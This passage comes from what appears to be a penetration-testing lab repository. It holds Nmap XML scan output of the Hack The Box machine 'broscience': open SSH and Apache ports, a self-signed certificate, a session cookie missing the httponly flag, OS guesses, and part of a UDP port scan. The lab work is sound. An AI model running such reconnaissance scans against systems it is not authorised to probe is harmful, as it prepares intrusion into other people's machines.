<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">3f8a56f8958faeafe3ae7eb880f679d2</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">3c6575274ae2ef9391374cfdd9d46341</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" hostname="broscience.htb" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-title" output="Did not follow redirect to https://broscience.htb/"><elem key="redirect_url">https://broscience.htb/</elem>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" extrainfo="(Debian)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="ssl-date" output="TLS randomness does not represent time"></script><script id="tls-alpn" output="&#xa; http/1.1"><elem>http/1.1</elem>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script><script id="ssl-cert" output="Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb&#xa;Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb&#xa;Public Key type: rsa&#xa;Public Key bits: 4096&#xa;Signature Algorithm: sha256WithRSAEncryption&#xa;Not valid before: 2022-07-14T19:48:36&#xa;Not valid after: 2023-07-14T19:48:36&#xa;MD5: 5328ddd62f3429d11d26ae8a68d86e0c&#xa;SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b&#xa;-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;"><table key="subject">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="issuer">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="pubkey">
<elem key="type">rsa</elem>
<elem key="bits">4096</elem>
<elem key="modulus">A7325F613F7BC06AC9153A16828E5A8585268EA72C784A074C0D8263EB714679C9C8B33DCFBA7AB7A8160CD99A3E6A2349415B8659367E66E6705C025571082EAACD3FAF518D4D8FC5720B4B1E87DD002581971F2956389A0497E6BC50EADB8AB6E4BAF24D8701BA12BCA8D9E9D68264A4C871C88C7D9D992DBDBE6C9DC4025A7D3474E084246E6C9F85BB98304979699650092F99B80FB93110966E9660F04D363B9CC05926BA29CDD6D439E310524D10263D7F08A06BCE36B11ED0C5061A24DDF46C14001B40C981ACBA01FFBB701F3673322DF1A45A81CAE4AC2781B5673AB74557C82380A9E552821AB362166E01B19069024DFE581C54BD99932F09B5EEF41065BD2ECAB59BAA3DDA0A0C09F1052B12A2783D27895B4E5B5BFF9A4BB0306ED1E95458F43EB24A7F634CAD169A60585F4575E39A18054F1651B840A9900F6FFBEC6B21A656C29A5FAAEE3543B4B74ED984C8CEF063B5981879D3BFB7611B58CEDC2E78238BEDEDCDE6374E59721AB865D069FA3D8E1BA195EB64B66785B39CAD3398137F45FB47E227936728BA6E5323F2952B65902DBFA848E920A9BAD5A48CABDD8AE9A96D4D9F27A43F07946C2FE7E3FB9266FD7EF501E3189DDA42D5A67FBDC91429060417A2ACDB9F6F8FE299D5FC199A6426CDF991C2F7DA04727E92C717D8321086D6F4D1275F592983C55F0AB5093A34793C579D8D5B70E06FDB</elem>
<elem key="exponent">65537</elem>
</table>
<table key="extensions">
<table>
<elem key="name">X509v3 Subject Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Authority Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Basic Constraints</elem>
<elem key="value">CA:TRUE</elem>
<elem key="critical">true</elem>
</table>
</table>
<elem key="sig_algo">sha256WithRSAEncryption</elem>
<table key="validity">
<elem key="notBefore">2022-07-14T19:48:36</elem>
<elem key="notAfter">2023-07-14T19:48:36</elem>
</table>
<elem key="md5">5328ddd62f3429d11d26ae8a68d86e0c</elem>
<elem key="sha1">20568d0d9e4109cde5a22021fe3f349c40d8d75b</elem>
<elem key="pem">-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;</elem>
</script><script id="http-title" output="BroScience : Home"><elem key="title">BroScience : Home</elem>
</script><script id="http-cookie-flags" output="&#xa; /: &#xa; PHPSESSID: &#xa; httponly flag not set"><table key="/">
<table key="PHPSESSID">
<elem>httponly flag not set</elem>
</table>
</table>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<osmatch name="Linux 4.15 - 5.6" accuracy="94" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="94" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="94" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.3" accuracy="93" line="68082">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="93" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="93" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="92" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="92"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="Crestron XPanel control system" accuracy="91" line="19543">
<osclass type="specialized" vendor="Crestron" osfamily="2-Series" accuracy="91"><cpe>cpe:/o:crestron:2_series</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.4" accuracy="91" line="68194">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="91"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.39 - 3.2" accuracy="90" line="58264">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:2.6</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:3</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9845%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)&#xa;OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
</os>
<uptime seconds="2473002" lastboot="Wed Jan 4 02:53:31 2023"/>
<distance value="2"/>
<tcpsequence index="259" difficulty="Good luck!" values="9E48F436,31090BF2,6E8E0510,89FC0060,E58BE177,48723238"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="9366B9FF,9366BA64,9366BAC8,9366BB2C,9366BB91,9366BBF5"/>
<trace port="1720" proto="tcp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="93.25"/>
<hop ttl="2" ipaddr="10.10.11.195" rtt="93.24" host="broscience.htb"/>
</trace>
<times srtt="48493" rttvar="34121" to="184977"/>
</host>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<runstats><finished time="1675270213" timestr="Wed Feb 1 17:50:13 2023" summary="Nmap done at Wed Feb 1 17:50:13 2023; 1 IP address (1 host up) scanned in 34.82 seconds" elapsed="34.82" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

158
HTB/broscience/results/scans/xml/_top_100_udp_nmap.xml Normal file
View File

@@ -0,0 +1,158 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml 10.10.11.195" start="1675270179" startstr="Wed Feb 1 17:49:39 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="UDP Scan" time="1675270179"/>
<taskend task="UDP Scan" time="1675270243" extrainfo="100 total ports"/>
<taskbegin task="Service scan" time="1675270243"/>
<taskprogress task="Service scan" time="1675270294" percent="2.94" remaining="1684" etc="1675271977"/>
<taskprogress task="Service scan" time="1675270325" percent="20.59" remaining="317" etc="1675270641"/>
<taskend task="Service scan" time="1675270359" extrainfo="34 services on 1 host"/>
<taskbegin task="Traceroute" time="1675270363"/>
<taskend task="Traceroute" time="1675270364"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1675270364"/>
<taskend task="Parallel DNS resolution of 1 host." time="1675270375"/>
<taskbegin task="NSE" time="1675270375"/>
<taskprogress task="NSE" time="1675270406" percent="98.93" remaining="1" etc="1675270406"/>
<taskprogress task="NSE" time="1675270436" percent="99.53" remaining="1" etc="1675270436"/>
<taskprogress task="NSE" time="1675270466" percent="99.89" remaining="1" etc="1675270466"/>
<taskend task="NSE" time="1675270470"/>
<taskbegin task="NSE" time="1675270470"/>
<taskend task="NSE" time="1675270472"/>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<host starttime="1675270179" endtime="1675270472"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><port protocol="udp" portid="7"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="echo" method="table" conf="3"/></port>
<port protocol="udp" portid="9"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="discard" method="table" conf="3"/></port>
<port protocol="udp" portid="17"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="qotd" method="table" conf="3"/></port>
<port protocol="udp" portid="19"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="chargen" method="table" conf="3"/></port>
<port protocol="udp" portid="49"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="tacacs" method="table" conf="3"/></port>
<port protocol="udp" portid="53"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="domain" method="table" conf="3"/></port>
<port protocol="udp" portid="67"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcps" method="table" conf="3"/></port>
<port protocol="udp" portid="68"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcpc" method="table" conf="3"/></port>
<port protocol="udp" portid="69"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="tftp" method="table" conf="3"/></port>
<port protocol="udp" portid="80"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="http" method="table" conf="3"/></port>
<port protocol="udp" portid="88"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="kerberos-sec" method="table" conf="3"/></port>
<port protocol="udp" portid="111"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="rpcbind" method="table" conf="3"/></port>
<port protocol="udp" portid="120"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="cfdptkt" method="table" conf="3"/></port>
<port protocol="udp" portid="123"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ntp" method="table" conf="3"/></port>
<port protocol="udp" portid="135"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="udp" portid="136"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="profile" method="table" conf="3"/></port>
<port protocol="udp" portid="137"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="netbios-ns" method="table" conf="3"/></port>
<port protocol="udp" portid="138"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="netbios-dgm" method="table" conf="3"/></port>
<port protocol="udp" portid="139"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="netbios-ssn" method="table" conf="3"/></port>
<port protocol="udp" portid="158"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="pcmail-srv" method="table" conf="3"/></port>
<port protocol="udp" portid="161"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="snmp" method="table" conf="3"/></port>
<port protocol="udp" portid="162"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="snmptrap" method="table" conf="3"/></port>
<port protocol="udp" portid="177"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="xdmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="427"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="svrloc" method="table" conf="3"/></port>
<port protocol="udp" portid="443"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="https" method="table" conf="3"/></port>
<port protocol="udp" portid="445"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="microsoft-ds" method="table" conf="3"/></port>
<port protocol="udp" portid="497"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="retrospect" method="table" conf="3"/></port>
<port protocol="udp" portid="500"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="isakmp" method="table" conf="3"/></port>
<port protocol="udp" portid="514"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="syslog" method="table" conf="3"/></port>
<port protocol="udp" portid="515"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="printer" method="table" conf="3"/></port>
<port protocol="udp" portid="518"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ntalk" method="table" conf="3"/></port>
<port protocol="udp" portid="520"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="route" method="table" conf="3"/></port>
<port protocol="udp" portid="593"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="http-rpc-epmap" method="table" conf="3"/></port>
<port protocol="udp" portid="623"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="asf-rmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="626"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="serialnumberd" method="table" conf="3"/></port>
<port protocol="udp" portid="631"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ipp" method="table" conf="3"/></port>
<port protocol="udp" portid="996"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="vsinet" method="table" conf="3"/></port>
<port protocol="udp" portid="997"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="maitrd" method="table" conf="3"/></port>
<port protocol="udp" portid="998"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="puparp" method="table" conf="3"/></port>
<port protocol="udp" portid="999"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="applix" method="table" conf="3"/></port>
<port protocol="udp" portid="1022"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="exp2" method="table" conf="3"/></port>
<port protocol="udp" portid="1023"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="1025"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="blackjack" method="table" conf="3"/></port>
<port protocol="udp" portid="1026"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="win-rpc" method="table" conf="3"/></port>
<port protocol="udp" portid="1027"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="1028"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ms-lsa" method="table" conf="3"/></port>
<port protocol="udp" portid="1029"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="solid-mux" method="table" conf="3"/></port>
<port protocol="udp" portid="1030"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="iad1" method="table" conf="3"/></port>
<port protocol="udp" portid="1433"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="ms-sql-s" method="table" conf="3"/></port>
<port protocol="udp" portid="1434"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ms-sql-m" method="table" conf="3"/></port>
<port protocol="udp" portid="1645"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="radius" method="table" conf="3"/></port>
<port protocol="udp" portid="1646"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="radacct" method="table" conf="3"/></port>
<port protocol="udp" portid="1701"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="L2TP" method="table" conf="3"/></port>
